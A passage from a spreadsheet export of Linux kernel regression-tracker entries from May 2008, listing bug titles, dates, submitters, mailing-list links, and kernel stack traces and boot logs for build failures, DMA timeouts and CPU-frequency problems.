[&lt;c0110670&gt;] smp_apic_timer_interrupt+0x6c/0x80 [52478.405955] [&lt;c0104417&gt;] apic_timer_interrupt+0x33/0x38 [52478.405955] [&lt;f8a0022d&gt;] ? linear_transfer+0xce/0x155 [snd_pcm_oss] [52478.405955] [&lt;f89ff159&gt;] snd_pcm_plug_write_transfer+0x75/0x9f [snd_pcm_oss] [52478.405955] [&lt;f89fb6d8&gt;] snd_pcm_oss_write2+0x82/0xc0 [snd_pcm_oss] [52478.405955] [&lt;f89fcfb6&gt;] snd_pcm_oss_write+0x165/0x1ca [snd_pcm_oss] [52478.405955] [&lt;f89fce51&gt;] ? snd_pcm_oss_write+0x0/0x1ca [snd_pcm_oss] [52478.405955] [&lt;c016f557&gt;] vfs_write+0x8c/0x108 [52478.405955] [&lt;c016faee&gt;] sys_write+0x3b/0x60 [52478.405955] [&lt;c01038b9&gt;] sysenter_past_esp+0x6a/0xb1 [52478.405955] =======================</t>
  </si>
  <si>
    <t>build issue #494 for v2.6.26-rc2 in tuner-xc2028.c undefined reference to `i2c_transfer'</t>
  </si>
  <si>
    <t>2008-05-15 14:59 UTC</t>
  </si>
  <si>
    <t>2008-05-15 16:14 UTC</t>
  </si>
  <si>
    <t>Subject : build issue #494 for v2.6.26-rc2 in tuner-xc2028.c undefined reference to `i2c_transfer' Submitter : Toralf Förster &lt;toralf.foerster@gmx.de&gt; Date : 2008-05-12 10:12 References : http://lkml.org/lkml/2008/5/12/60 This entry is being used for tracking a regression from 2.6.25. Please don't close it until the problem is fixed in the mainline.</t>
  </si>
  <si>
    <t>[vfs/tty] possible circular locking dependency detected</t>
  </si>
  <si>
    <t>2.6.26-rc1-00007-g91b3a7a</t>
  </si>
  <si>
    <t>2008-05-15 15:14 UTC</t>
  </si>
  <si>
    <t>2008-05-15 16:16 UTC</t>
  </si>
  <si>
    <t>Subject : [vfs/tty] possible circular locking dependency detected Submitter : Marcin Slusarz &lt;marcin.slusarz@gmail.com&gt; Date : 2008-05-12 18:32 References : http://marc.info/?l=linux-kernel&amp;m=121061724820903&amp;w=4 Handled-By : Andrew Morton &lt;akpm@linux-foundation.org&gt; Handled-By : Oleg Nesterov &lt;oleg@tv-sign.ru&gt; Patch : http://lkml.org/lkml/2008/5/15/211 This entry is being used for tracking a regression from 2.6.25. Please don't close it until the problem is fixed in the mainline.</t>
  </si>
  <si>
    <t>request_firmware() gives build failures</t>
  </si>
  <si>
    <t>2008-05-15 15:18 UTC</t>
  </si>
  <si>
    <t>2008-05-15 23:20 UTC</t>
  </si>
  <si>
    <t>Subject : request_firmware() gives build failures Submitter : Jonathan Corbet &lt;corbet@lwn.net&gt; Date : 2008-05-12 21:48 References : http://marc.info/?l=linux-kernel&amp;r=1&amp;w=4 Handled-By : Jiri Slaby &lt;jirislaby@gmail.com&gt; This entry is being used for tracking a regression from 2.6.25. Please don't close it until the problem is fixed in the mainline.</t>
  </si>
  <si>
    <t>V4L2-based build error</t>
  </si>
  <si>
    <t>2008-05-15 15:22 UTC</t>
  </si>
  <si>
    <t>2008-05-29 14:18 UTC</t>
  </si>
  <si>
    <t>Subject : V4L2-based build error Submitter : Jonathan Corbet &lt;corbet@lwn.net&gt; Date : 2008-05-12 22:14 References : http://marc.info/?l=linux-kernel&amp;m=121063048408534&amp;w=4 Handled-By : Mauro Carvalho Chehab &lt;mchehab@infradead.org&gt; This entry is being used for tracking a regression from 2.6.25. Please don't close it until the problem is fixed in the mainline.</t>
  </si>
  <si>
    <t>2.6.26-rc2 hosed X?</t>
  </si>
  <si>
    <t>2008-05-15 15:29 UTC</t>
  </si>
  <si>
    <t>2008-05-20 02:31 UTC</t>
  </si>
  <si>
    <t>Subject : 2.6.26-rc2 hosed X? Submitter : Norbert Preining &lt;preining@logic.at&gt; Date : 2008-05-13 10:38 References : http://marc.info/?l=linux-kernel&amp;m=121067784803118&amp;w=4 Handled-By : "Dave Airlie" &lt;airlied@gmail.com&gt; Handled-By : Ingo Molnar &lt;mingo@elte.hu&gt; Patch : http://marc.info/?l=linux-kernel&amp;m=121074889124387&amp;w=4 This entry is being used for tracking a regression from 2.6.25. Please don't close it until the problem is fixed in the mainline.</t>
  </si>
  <si>
    <t>[BISECTED] Lots of "rescheduling IPIs" in powertop</t>
  </si>
  <si>
    <t>Commit 0c07ee38c9d4eb081758f5ad14bbffa7197e1aec</t>
  </si>
  <si>
    <t>2008-05-15 15:34 UTC</t>
  </si>
  <si>
    <t>2008-05-25 11:21 UTC</t>
  </si>
  <si>
    <t>Subject : [BISECTED] Lots of "rescheduling IPIs" in powertop Submitter : Vegard Nossum &lt;vegard.nossum@gmail.com&gt; Date : 2008-05-13 20:42 References : http://marc.info/?l=linux-kernel&amp;m=121071176205864&amp;w=4 Handled-By : Andi Kleen &lt;andi@firstfloor.org&gt; Handled-By : Arjan van de Ven &lt;arjan@infradead.org&gt; Handled-By : Ingo Molnar &lt;mingo@elte.hu&gt; Patch : http://marc.info/?l=linux-kernel&amp;m=121074826823352&amp;w=4 This entry is being used for tracking a regression from 2.6.25. Please don't close it until the problem is fixed in the mainline.</t>
  </si>
  <si>
    <t>BUG: unable to handle kernel paging request - scsi_bus_uevent</t>
  </si>
  <si>
    <t>2008-05-15 15:42 UTC</t>
  </si>
  <si>
    <t>2008-06-16 14:49 UTC</t>
  </si>
  <si>
    <t>Subject : BUG: unable to handle kernel paging request - scsi_bus_uevent Submitter : "Zdenek Kabelac" &lt;zdenek.kabelac@gmail.com&gt; Date : 2008-05-14 11:23 References : http://lkml.org/lkml/2008/5/14/111 This entry is being used for tracking a regression from 2.6.25. Please don't close it until the problem is fixed in the mainline.</t>
  </si>
  <si>
    <t>x86-64 build problem with tip</t>
  </si>
  <si>
    <t>2.6.26-rc2-git3</t>
  </si>
  <si>
    <t>2008-05-15 15:45 UTC</t>
  </si>
  <si>
    <t>2008-09-04 13:00 UTC</t>
  </si>
  <si>
    <t>Subject : x86-64 build problem with tip Submitter : Jeremy Fitzhardinge &lt;jeremy@goop.org&gt; Date : 2008-05-14 9:54 References : http://marc.info/?l=linux-kernel&amp;m=121075891210499&amp;w=4 This entry is being used for tracking a regression from 2.6.25. Please don't close it until the problem is fixed in the mainline.</t>
  </si>
  <si>
    <t>ehci splatter in 2.6.26-rc2</t>
  </si>
  <si>
    <t>2008-05-15 15:48 UTC</t>
  </si>
  <si>
    <t>2008-05-25 11:25 UTC</t>
  </si>
  <si>
    <t>Subject : ehci splatter in 2.6.26-rc2 Submitter : Lennert Buytenhek &lt;buytenh@wantstofly.org&gt; Date : 2008-05-14 11:24 References : http://marc.info/?l=linux-kernel&amp;m=121076435420129&amp;w=4 Handled-By : David Brownell &lt;david-b@pacbell.net&gt; This entry is being used for tracking a regression from 2.6.25. Please don't close it until the problem is fixed in the mainline.</t>
  </si>
  <si>
    <t>VIDEO_DEV=y, DVB_CORE=m build error</t>
  </si>
  <si>
    <t>2.6.26-rc2-372-g8f40f67</t>
  </si>
  <si>
    <t>2008-05-15 15:59 UTC</t>
  </si>
  <si>
    <t>2008-06-05 14:56 UTC</t>
  </si>
  <si>
    <t>Subject : build issue #502 for v2.6.26-rc2-372-g8f40f67 : video_exclusive_release undefined! Submitter : Toralf Förster &lt;toralf.foerster@gmx.de&gt; Date : 2008-05-15 13:15 References : http://marc.info/?l=linux-kernel&amp;m=121085736708543&amp;w=4 This entry is being used for tracking a regression from 2.6.25. Please don't close it until the problem is fixed in the mainline.</t>
  </si>
  <si>
    <t>[BUG] mm: bdi: export BDI attributes in sysfs</t>
  </si>
  <si>
    <t>2008-05-15 16:39 UTC</t>
  </si>
  <si>
    <t>2008-05-21 00:21 UTC</t>
  </si>
  <si>
    <t>Subject : [BUG] mm: bdi: export BDI attributes in sysfs Submitter : Arthur Jones &lt;ajones@riverbed.com&gt; Date : 2008-05-14 14:40 References : http://marc.info/?l=linux-kernel&amp;m=121077684815315&amp;w=4 Handled-By : Miklos Szeredi &lt;miklos@szeredi.hu&gt; Handled-By : Linus Torvalds &lt;torvalds@linux-foundation.org&gt; Handled-By : Greg KH &lt;greg@kroah.com&gt; Patch : http://marc.info/?l=linux-kernel&amp;m=121088552329700&amp;w=4 This entry is being used for tracking a regression from 2.6.25. Please don't close it until the problem is fixed in the mainline.</t>
  </si>
  <si>
    <t>linux 2.6.24 fails to mount ext3 rootfs on FUJITSU MHK2060AT</t>
  </si>
  <si>
    <t>2008-05-16 09:46 UTC</t>
  </si>
  <si>
    <t>Juergen Kosel</t>
  </si>
  <si>
    <t>2008-06-19 13:55 UTC</t>
  </si>
  <si>
    <t>Latest working kernel version:2.6.22.3 (Debian) Earliest failing kernel version:2.6.24.1 (from kernel.org) Distribution: Debian Hardware Environment:Laptop Compaq Armada 4120 Software Environment: Debian Testing Problem Description: When booting linux 2.6.24 (and also 2.6.25) it fails to mount the rootfs (hda1, with the following messages: hda: dma_timer_expiry: dma status == 0x21 hda: DMA timeout error hda: DMA timeout error: status=0x58 { DriveReady SeekComplete DataRequest } hda: dma disabled ide0: reset: success Done. Begin: Mounting root file system... ... Begin: Running /scripts/local-top ... Done. Begin: Running /scripts/local/premount ... kinit: trying to resume from /dev/hda5 Attempting manual resume kinit: No resume image, doing normal boot... resume: libcript version: 1.4.1 Done. JBD: no valid journal superblock found EXT3-fs: error loading journal. mount: Mounting /dev/hda1 on /root failed: invalid argument When booting linux 2.6.22 the following could be retrieved: compac:~# lspci -vv 00:00.0 Host bridge: OPTi Inc. 82C557 [Viper-M] (rev 14) Control: I/O+ Mem+ BusMaster+ SpecCycle- MemWINV- VGASnoop- ParErr- Stepping- SERR- FastB2B- DisINTx- Status: Cap- 66MHz- UDF- FastB2B+ ParErr- DEVSEL=medium &gt;TAbort- &lt;TAbort- &lt;MAbort- &gt;SERR- &lt;PERR- INTx- Latency: 0 00:01.0 ISA bridge: OPTi Inc. 82C558 [Viper-M ISA+IDE] (rev 02) Control: I/O+ Mem+ BusMaster+ SpecCycle- MemWINV- VGASnoop- ParErr- Stepping- SERR- FastB2B- DisINTx- Status: Cap- 66MHz- UDF- FastB2B+ ParErr- DEVSEL=medium &gt;TAbort- &lt;TAbort- &lt;MAbort- &gt;SERR- &lt;PERR+ INTx- Latency: 0 Kernel modules: ata_generic, generic 00:02.0 VGA compatible controller: Cirrus Logic GD 7548 (prog-if 00 [VGA controller]) Control: I/O+ Mem+ BusMaster- SpecCycle- MemWINV- VGASnoop- ParErr- Stepping- SERR- FastB2B- DisINTx- Status: Cap- 66MHz- UDF- FastB2B- ParErr- DEVSEL=fast &gt;TAbort- &lt;TAbort- &lt;MAbort- &gt;SERR- &lt;PERR- INTx- Interrupt: pin A routed to IRQ 0 Region 0: Memory at 40000000 (32-bit, non-prefetchable) [size=16M] Region 1: Memory at 41000000 (32-bit, non-prefetchable) [size=16M] Kernel modules: cirrusfb 00:14.0 IDE interface: OPTi Inc. 82C621 [Viper-M/N+] (rev 12) (prog-if 80 [Master]) Control: I/O+ Mem- BusMaster+ SpecCycle- MemWINV- VGASnoop- ParErr- Stepping- SERR- FastB2B- DisINTx- Status: Cap- 66MHz- UDF- FastB2B+ ParErr- DEVSEL=medium &gt;TAbort- &lt;TAbort- &lt;MAbort- &gt;SERR- &lt;PERR- INTx- Latency: 0 Region 0: [virtual] Memory at 000001f0 (32-bit, non-prefetchable) [disabled] [size=8] Region 1: [virtual] Memory at 000003f0 (type 3, non-prefetchable) [disabled] [size=1] Region 2: [virtual] Memory at 00000170 (32-bit, non-prefetchable) [disabled] [size=8] Region 3: [virtual] Memory at 00000370 (type 3, non-prefetchable) [disabled] [size=1] Region 4: I/O ports at 1000 [size=16] Kernel driver in use: Opti621_IDE Kernel modules: opti621 compac:~# dmesg Linux version 2.6.22-3-486 (Debian 2.6.22-6) (maks@debian.org) (gcc version 4.1.3 20071019 (prerelease) (Debian 4.1.2-17)) #1 Mon Nov 12 07:53:08 UTC 2007 BIOS-provided physical RAM map: BIOS-e801: 0000000000000000 - 000000000009f000 (usable) BIOS-e801: 0000000000100000 - 0000000003000000 (usable) 48MB LOWMEM available. Entering add_active_range(0, 0, 12288) 0 entries of 256 used Zone PFN ranges: DMA 0 -&gt; 4096 Normal 4096 -&gt; 12288 early_node_map[1] active PFN ranges 0: 0 -&gt; 12288 On node 0 totalpages: 12288 DMA zone: 32 pages used for memmap DMA zone: 0 pages reserved DMA zone: 4064 pages, LIFO batch:0 Normal zone: 64 pages used for memmap Normal zone: 8128 pages, LIFO batch:0 DMI not present or invalid. Allocating PCI resources starting at 10000000 (gap: 03000000:fd000000) Built 1 zonelists. Total pages: 12192 Kernel command line: root=/dev/hda1 ro panic=5 No local APIC present or hardware disabled mapped APIC to ffffd000 (01061000) Initializing CPU#0 PID hash table entries: 256 (order: 8, 1024 bytes) Detected 120.691 MHz processor. Console: colour VGA+ 80x25 Dentry cache hash table entries: 8192 (order: 3, 32768 bytes) Inode-cache hash table entries: 4096 (order: 2, 16384 bytes) Memory: 39276k/49152k available (1656k kernel code, 9488k reserved, 650k data, 316k init, 0k highmem) virtual kernel memory layout: fixmap : 0xfffb5000 - 0xfffff000 ( 296 kB) vmalloc : 0xc3800000 - 0xfffb3000 ( 967 MB) lowmem : 0xc0000000 - 0xc3000000 ( 48 MB) .init : 0xc0344000 - 0xc0393000 ( 316 kB) .data : 0xc029e27b - 0xc0340cc4 ( 650 kB) .text : 0xc0100000 - 0xc029e27b (1656 kB) Checking if this processor honours the WP bit even in supervisor mode... Ok. Calibrating delay using timer specific routine.. 242.28 BogoMIPS (lpj=484566) Security Framework v1.0.0 initialized SELinux: Disabled at boot. Capability LSM initialized Mount-cache hash table entries: 512 CPU: After generic identify, caps: 000001bf 00000000 00000000 00000000 00000000 00000000 00000000 Intel Pentium with F0 0F bug - workaround enabled. CPU: After all inits, caps: 000001bf 00000000 00000000 00000000 00000000 00000000 00000000 Compat vDSO mapped to ffffe000. CPU: Intel Pentium 75 - 200 stepping 0c Checking 'hlt' instruction... OK. ACPI: Core revision 20070126 ACPI Exception (tbxface-0618): AE_NO_ACPI_TABLES, While loading namespace from ACPI tables [20070126] ACPI: Unable to load the System Description Tables Booting paravirtualized kernel on bare hardware NET: Registered protocol family 16 EISA bus registered PCI: PCI BIOS revision 2.10 entry at 0xf73d9, last bus=0 PCI: Using configuration type 1 Setting up standard PCI resources ACPI: Interpreter disabled. Linux Plug and Play Support v0.97 (c) Adam Belay pnp: PnP ACPI: disabled PnPBIOS: Scanning system for PnP BIOS support... PnPBIOS: Found PnP BIOS installation structure at 0xc00f5010 PnPBIOS: PnP BIOS version 1.0, entry 0xf0000:0x1a65, dseg 0xf0000 PnPBIOS: 18 nodes reported by PnP BIOS; 18 recorded by driver PCI: Probing PCI hardware PCI: Probing PCI hardware (bus 00) NET: Registered protocol family 8 NET: Registered protocol family 20 ACPI Error (evxfevnt-0186): Could not enable RealTimeClock event [20070126] ACPI Warning (evxface-0145): Could not enable fixed event 4 [20070126] pnp: 00:08: iomem range 0x0-0x9ffff could not be reserved pnp: 00:08: iomem range 0xf0000-0xfffff could not be reserved pnp: 00:08: iomem range 0x100000-0x2ffffff could not be reserved Time: tsc clocksource has been installed. pnp: 00:13: ioport range 0x100-0x107 has been reserved pnp: 00:13: ioport range 0x2a0-0x2a0 has been reserved pnp: 00:13: ioport range 0x370-0x371 has been reserved pnp: 00:13: iomem range 0xfffc0000-0xffffffff has been reserved NET: Registered protocol family 2 IP route cache hash table entries: 1024 (order: 0, 4096 bytes) TCP established hash table entries: 2048 (order: 2, 16384 bytes) TCP bind hash table entries: 2048 (order: 1, 8192 bytes) TCP: Hash tables configured (established 2048 bind 2048) TCP reno registered checking if image is initramfs... it is Freeing initrd memory: 6144k freed audit: initializing netlink socket (disabled) audit(1210697492.240:1): initialized VFS: Disk quotas dquot_6.5.1 Dquot-cache hash table entries: 1024 (order 0, 4096 bytes) io scheduler noop registered io scheduler anticipatory registered io scheduler deadline registered io scheduler cfq registered (default) Boot video device is 0000:00:02.0 isapnp: Scanning for PnP cards... isapnp: No Plug &amp; Play device found Serial: 8250/16550 driver $Revision: 1.90 $ 4 ports, IRQ sharing enabled serial8250: ttyS0 at I/O 0x3f8 (irq = 4) is a 16550A serial8250: ttyS2 at I/O 0x3e8 (irq = 4) is a 16550A 00:02: ttyS0 at I/O 0x3f8 (irq = 4) is a 16550A 00:03: ttyS2 at I/O 0x3e8 (irq = 4) is a 16550A RAMDISK driver initialized: 16 RAM disks of 8192K size 1024 blocksize PNP: PS/2 Controller [PNP0303,PNP0f0e] at 0x60,0x64 irq 1,12 serio: i8042 KBD port at 0x60,0x64 irq 1 serio: i8042 AUX port at 0x60,0x64 irq 12 mice: PS/2 mouse device common for all mice EISA: Probing bus 0 at eisa.0 Cannot allocate resource for EISA slot 1 EISA: Detected 0 cards. TCP bic registered NET: Registered protocol family 1 NET: Registered protocol family 17 Using IPI Shortcut mode Freeing unused kernel memory: 316k freed input: AT Translated Set 2 keyboard as /class/input/input0 thermal: Unknown symbol acpi_processor_set_thermal_limit Uniform Multi-Platform E-IDE driver Revision: 7.00alpha2 ide: Assuming 33MHz system bus speed for PIO modes; override with idebus=xx SCSI subsystem initialized OPTI621: IDE controller at PCI slot 0000:00:14.0 OPTI621: chipset revision 18 OPTI621: not 100% native mode: will probe irqs later PCI: Setting latency timer of device 0000:00:14.0 to 64 ide0: BM-DMA at 0x1000-0x1007, BIOS settings: hda:pio, hdb:pio Probing IDE interface ide0... hda: FUJITSU MHK2060AT, ATA DISK drive libata version 2.21 loaded. ide0 at 0x1f0-0x1f7,0x3f6 on irq 14 Floppy drive(s): fd0 is 1.44M FDC 0 is a post-1991 82077 hda: max request size: 128KiB hda: 11733120 sectors (6007 MB) w/512KiB Cache, CHS=12416/15/63, (U)DMA hda: cache flushes not supported hda:&lt;4&gt;hda: dma_timer_expiry: dma status == 0x21 hda: DMA timeout error hda: dma timeout error: status=0x58 { DriveReady SeekComplete DataRequest } ide: failed opcode was: unknown hda: DMA disabled ide0: reset: success hda1 hda2 &lt;&lt;4&gt;hda: dma_timer_expiry: dma status == 0x21 hda: DMA timeout error hda: dma timeout error: status=0x58 { DriveReady SeekComplete DataRequest } ide: failed opcode was: unknown hda: DMA disabled ide0: reset: success hda5&lt;4&gt;hda: dma_timer_expiry: dma status == 0x21 hda: DMA timeout error hda: dma timeout error: status=0x58 { DriveReady SeekComplete DataRequest } ide: failed opcode was: unknown hda: DMA disabled ide0: reset: success hda6 &gt; hda: dma_timer_expiry: dma status == 0x21 hda: DMA timeout error hda: dma timeout error: status=0x58 { DriveReady SeekComplete DataRequest } ide: failed opcode was: unknown hda: DMA disabled ide0: reset: success Attempting manual resume swsusp: Basic memory bitmaps created swsusp: Basic memory bitmaps freed kjournald starting. Commit interval 5 seconds EXT3-fs: mounted filesystem with ordered data mode. input: PC Speaker as /class/input/input1 Real Time Clock Driver v1.12ac parport_pc 00:01: reported by Plug and Play BIOS parport0: PC-style at 0x378, irq 7 [PCSPP,TRISTATE,EPP] parport1: PC-style at 0x3bc [PCSPP,TRISTATE] parport2: PC-style at 0x278 [PCSPP,TRISTATE,EPP] input: ImPS/2 Generic Wheel Mouse as /class/input/input2 Adding 75560k swap on /dev/hda5. Priority:-1 extents:1 across:75560k EXT3 FS on hda1, internal journal apm: BIOS version 1.2 Flags 0x03 (Driver version 1.16ac) device-mapper: ioctl: 4.11.0-ioctl (2006-10-12) initialised: dm-devel@redhat.com Intel ISA PCIC probe: Cirrus PD672x ISA-to-PCMCIA at port 0x3e0 ofs 0x00, 2 sockets host opts [0]: [ring] [65/6/3] [1/15/3] host opts [1]: [ring] [65/6/3] [1/15/3] ISA irqs (default) = 3,4,5,9,10,11 polling interval = 1000 ms pccard: PCMCIA card inserted into slot 1 cs: IO port probe 0x100-0x4ff: excluding 0x200-0x207 0x220-0x22f 0x330-0x337 0x388-0x38f 0x400-0x40f 0x480-0x48f 0x4c0-0x4df cs: IO port probe 0x800-0x8ff: clean. cs: IO port probe 0xc00-0xcff: clean. cs: IO port probe 0x100-0x4ff: excluding 0x200-0x207 0x220-0x22f 0x330-0x337 0x388-0x38f 0x400-0x40f 0x480-0x48f 0x4c0-0x4df cs: IO port probe 0x800-0x8ff: clean. cs: IO port probe 0xc00-0xcff: clean. cs: IO port probe 0xa00-0xaff: clean. cs: memory probe 0x0d0000-0x0dffff: clean. pcmcia: registering new device pcmcia1.0 cs: IO port probe 0xa00-0xaff: clean. eth0: NE2000 Compatible: io 0x300, irq 3, hw_addr 00:E0:98:98:6C:8E NET: Registered protocol family 10 lo: Disabled Privacy Extensions compac:~# The hardware is very old (&gt; 10 years) so it might be dying hardware. But what appears suspicious to me is the fact that older linux versions succeed in mounting the rootfs. Steps to reproduce:</t>
  </si>
  <si>
    <t>System is unstable with EC GPE storm detected</t>
  </si>
  <si>
    <t>2.6.26-rc2-git5</t>
  </si>
  <si>
    <t>2008-05-16 13:18 UTC</t>
  </si>
  <si>
    <t>2008-10-24 23:23 UTC</t>
  </si>
  <si>
    <t>Subject : ACPI : EC: GPE Submitter : "Justin Mattock" &lt;justinmattock@gmail.com&gt; Date : 2008-05-16 6:17 References : http://marc.info/?l=linux-kernel&amp;m=121091875711824&amp;w=4 This entry is being used for tracking a regression from 2.6.25. Please don't close it until the problem is fixed in the mainline.</t>
  </si>
  <si>
    <t>USB Mass storage mount fails: Write protect on</t>
  </si>
  <si>
    <t>2008-05-16 13:21 UTC</t>
  </si>
  <si>
    <t>2008-07-13 12:33 UTC</t>
  </si>
  <si>
    <t>Subject : Write protect on on Submitter : "Maciej Rutecki" &lt;maciej.rutecki@gmail.com&gt; Date : 2008-05-16 14:55 References : http://marc.info/?l=linux-kernel&amp;m=121095168003572&amp;w=4 This entry is being used for tracking a regression from 2.6.25. Please don't close it until the problem is fixed in the mainline.</t>
  </si>
  <si>
    <t>x86-64 NODES_SHIFT compile failure.</t>
  </si>
  <si>
    <t>Commit 4323838215184f5a2f081e0d17b8d60731b03164</t>
  </si>
  <si>
    <t>2008-05-16 13:27 UTC</t>
  </si>
  <si>
    <t>2008-07-06 08:56 UTC</t>
  </si>
  <si>
    <t>Mike Travis</t>
  </si>
  <si>
    <t>Subject : x86-64 NODES_SHIFT compile failure. Submitter : Dave Jones &lt;davej@codemonkey.org.uk&gt; Date : 2008-05-16 12:54 References : http://lkml.org/lkml/2008/5/16/312 Handled-By : Mike Travis &lt;travis@sgi.com&gt; Patch : http://lkml.org/lkml/2008/5/16/343 This entry is being used for tracking a regression from 2.6.25. Please don't close it until the problem is fixed in the mainline.</t>
  </si>
  <si>
    <t>2.6.25-2-amd64</t>
  </si>
  <si>
    <t>2008-05-16 20:13 UTC</t>
  </si>
  <si>
    <t>Andreas Juch</t>
  </si>
  <si>
    <t>2008-06-13 00:34 UTC</t>
  </si>
  <si>
    <t>Latest working kernel version: 2.6.24-1-amd64 Earliest failing kernel version: 2.6.25 Distribution: Debian testing/unstable Hardware Environment: Intel DG965WH Mainboard, Intel C2D E6600 Processor, 3 GiB RAM, using the internal Intel graphics, only other H/W: Technotrend/Siemens DVB-S Card. Software Environment: Debian testing/unstable with most packages from testing. Problem Description: The system freezes after some hours (about four or so) uptime. Nothing can be done after that. The logs don't show data about the crash. Kernel 2.6.24 works very well, so hardware failure is not possible. The dmesg outputs between .24 and .25 show lots of differences, but the messages closest to the crash are "rtc: lost n interrupts" (n is from 1 to 8). The attached dmesg outputs are from Debian kernels, but I tried 2.6.25 from kernel.org and got exactly the same freezes, so I think it is irrelevant here. The freezes always happened during X.org sessions, sometimes I was working on the systems, sometimes it froze while I was not at the system. I'll attach both system logs as this is the only information I have about the freezes. Alt-sysrq-t has no effect. Steps to reproduce: Work at my PC or just let it run long enough :-(</t>
  </si>
  <si>
    <t>build issue #503 for v2.6.26-rc2-433-gf26a398 :  undefined reference to `request_firmware'</t>
  </si>
  <si>
    <t>2.6.26-rc2-433-gf26a398</t>
  </si>
  <si>
    <t>2008-05-17 03:06 UTC</t>
  </si>
  <si>
    <t>2008-07-04 14:40 UTC</t>
  </si>
  <si>
    <t>Subject : build issue #503 for v2.6.26-rc2-433-gf26a398 : undefined reference to `request_firmware' Submitter : Toralf Förster &lt;toralf.foerster@gmx.de&gt; Date : 2008-05-16 17:06 References : http://marc.info/?l=linux-kernel&amp;m=121095777616792&amp;w=4 This entry is being used for tracking a regression from 2.6.25. Please don't close it until the problem is fixed in the mainline.</t>
  </si>
  <si>
    <t>gianfar build failure.</t>
  </si>
  <si>
    <t>Commit d0313587547092af7f5ee8a576793e1e5d61be89</t>
  </si>
  <si>
    <t>2008-05-17 03:09 UTC</t>
  </si>
  <si>
    <t>2008-05-27 06:30 UTC</t>
  </si>
  <si>
    <t>Paul Gortmaker</t>
  </si>
  <si>
    <t>Subject : gianfar build failure. Submitter : Dave Jones &lt;davej@redhat.com&gt; Date : 2008-05-16 23:29 References : http://marc.info/?l=linux-kernel&amp;m=121098065023786&amp;w=4 Handled-By : Paul Gortmaker &lt;paul.gortmaker@windriver.com&gt; This entry is being used for tracking a regression from 2.6.25. Please don't close it until the problem is fixed in the mainline.</t>
  </si>
  <si>
    <t>REGRESSION: 2.6.26-rc2-git4: X server failed start on X61s laptop</t>
  </si>
  <si>
    <t>2.6.26-rc2-git4</t>
  </si>
  <si>
    <t>2008-05-17 03:11 UTC</t>
  </si>
  <si>
    <t>2008-05-29 13:51 UTC</t>
  </si>
  <si>
    <t>Subject : REGRESSION: 2.6.26-rc2-git4: X server failed start on X61s laptop Submitter : "Theodore Ts'o" &lt;tytso@mit.edu&gt; Date : 2008-05-17 7:32 References : http://marc.info/?l=linux-kernel&amp;m=121100994722524&amp;w=4 This entry is being used for tracking a regression from 2.6.25. Please don't close it until the problem is fixed in the mainline.</t>
  </si>
  <si>
    <t>avr32: export copy_page</t>
  </si>
  <si>
    <t>2.6.26-rc2-git</t>
  </si>
  <si>
    <t>2008-05-17 09:01 UTC</t>
  </si>
  <si>
    <t>2008-05-28 00:40 UTC</t>
  </si>
  <si>
    <t>Subject : avr32: export copy_page Submitter : Adrian Bunk &lt;bunk@kernel.org&gt; References : http://article.gmane.org/gmane.linux.kernel/676240 Handled-By : Adrian Bunk &lt;bunk@kernel.org&gt; Patch : http://article.gmane.org/gmane.linux.kernel/676240</t>
  </si>
  <si>
    <t>CPU Frequency scaling gone on CPU1 after resume-from-sleep - Dell Latitude D630, XPS M1330</t>
  </si>
  <si>
    <t>2008-05-17 12:30 UTC</t>
  </si>
  <si>
    <t>Dennis Noordsij</t>
  </si>
  <si>
    <t>2008-10-24 22:56 UTC</t>
  </si>
  <si>
    <t>Latest working kernel version: unknown Earliest failing kernel version: at least 2.6.22 Distribution: Ubuntu Hardy (confirmed bug with mainline 2.6.26-rc2) Hardware Environment: Dell Latitude D630 Software Environment: Ubuntu Hardy Problem Description: Normally, cpufreq-info reports: cpufrequtils 002: cpufreq-info (C) Dominik Brodowski 2004-2006 Report errors and bugs to linux@brodo.de, please. analyzing CPU 0: driver: acpi-cpufreq CPUs which need to switch frequency at the same time: 0 1 hardware limits: 800 MHz - 2.20 GHz available frequency steps: 2.20 GHz, 2.20 GHz, 1.60 GHz, 1.20 GHz, 800 MHz available cpufreq governors: powersave, ondemand, conservative, userspace, performance current policy: frequency should be within 800 MHz and 2.20 GHz. The governor "ondemand" may decide which speed to use within this range. current CPU frequency is 800 MHz. analyzing CPU 1: driver: acpi-cpufreq CPUs which need to switch frequency at the same time: 0 1 hardware limits: 800 MHz - 2.20 GHz available frequency steps: 2.20 GHz, 2.20 GHz, 1.60 GHz, 1.20 GHz, 800 MHz available cpufreq governors: powersave, ondemand, conservative, userspace, performance current policy: frequency should be within 800 MHz and 2.20 GHz. The governor "ondemand" may decide which speed to use within this range. current CPU frequency is 800 MHz. However, after resuming from sleep the following is reported in dmesg: [ 296.435243] Back to C! [ 296.435243] Extended CMOS year: 2000 [ 296.435243] Enabling non-boot CPUs ... [ 296.435243] CPU0 attaching NULL sched-domain. [ 296.435243] SMP alternatives: switching to SMP code [ 296.441457] Booting processor 1/1 ip 6000 [ 296.448433] Initializing CPU#1 [ 296.448433] Calibrating delay using timer specific routine.. 4389.13 BogoMIPS (lpj=8778260) [ 296.448433] CPU: L1 I cache: 32K, L1 D cache: 32K [ 296.448433] CPU: L2 cache: 4096K [ 296.448433] CPU: Physical Processor ID: 0 [ 296.448433] CPU: Processor Core ID: 1 [ 296.529004] CPU1: Intel(R) Core(TM)2 Duo CPU T7500 @ 2.20GHz stepping 0b [ 296.529035] CPU0 attaching sched-domain: [ 296.529038] domain 0: span 0-1 [ 296.529039] groups: 0 1 [ 296.529042] CPU1 attaching sched-domain: [ 296.529043] domain 0: span 0-1 [ 296.529045] groups: 1 0 [ 296.448433] ACPI Error (psloop-0136): Found unknown opcode FE at AML address f883c7ca offset 3, ignoring [20080321] [ 296.448433] ACPI Error (psloop-0136): Found unknown opcode 1F at AML address f883c7cd offset 6, ignoring [20080321] [ 296.448433] ACPI Error (psloop-0136): Found unknown opcode 2 at AML address f883c7d4 offset D, ignoring [20080321] [ 296.448433] ACPI Error (psloop-0136): Found unknown opcode C2 at AML address f883c7d6 offset F, ignoring [20080321] [ 296.448433] ACPI Error (psargs-0358): [E] Namespace lookup failure, AE_NOT_FOUND [ 296.448433] ACPI Error (psparse-0530): Method parse/execution failed [\_PR_.CPU1._PCT] (Node f4c17930), AE_NOT_FOUND [ 296.448433] ACPI Exception (processor_perflib-0191): AE_NOT_FOUND, Evaluating _PCT [20080321] [ 296.448433] CPU1 is up [ 296.552171] Switched to high resolution mode on CPU 1 and cpufreq-info reports: cpufrequtils 002: cpufreq-info (C) Dominik Brodowski 2004-2006 Report errors and bugs to linux@brodo.de, please. analyzing CPU 0: driver: 